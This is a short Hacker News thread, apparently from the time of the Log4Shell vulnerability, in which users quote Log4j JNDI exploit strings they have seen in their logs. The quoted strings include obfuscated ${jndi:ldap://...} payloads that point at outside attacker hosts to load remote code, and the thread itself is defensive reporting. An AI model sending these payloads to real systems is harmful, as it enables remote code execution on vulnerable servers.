top | item 29563986 (no title) shushpanchik | 4 years ago As I understood, your policy blocks LDAP port (389). All of the scanning I see in logs at the moment use port 80: "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}" discuss order hn newest iso1631|4 years ago Last ones I've seenjndi:dns://ip.address.scanworld.net/refjndi:ldap://162.55.90.26/222xxxx905/Cjndi:ldap://195.54.160.149:12344/Basic/Command/Base64...jndi:ldap://45.130.229.168:1389/Exploit{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....Surprisingly very few attempts via http calls, and while some are on default ports, most aren't.I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting.
iso1631|4 years ago Last ones I've seenjndi:dns://ip.address.scanworld.net/refjndi:ldap://162.55.90.26/222xxxx905/Cjndi:ldap://195.54.160.149:12344/Basic/Command/Base64...jndi:ldap://45.130.229.168:1389/Exploit{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....Surprisingly very few attempts via http calls, and while some are on default ports, most aren't.I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting.
iso1631|4 years ago
jndi:dns://ip.address.scanworld.net/ref
jndi:ldap://162.55.90.26/222xxxx905/C
jndi:ldap://195.54.160.149:12344/Basic/Command/Base64...
jndi:ldap://45.130.229.168:1389/Exploit
{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....
Surprisingly very few attempts via http calls, and while some are on default ports, most aren't.
I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting.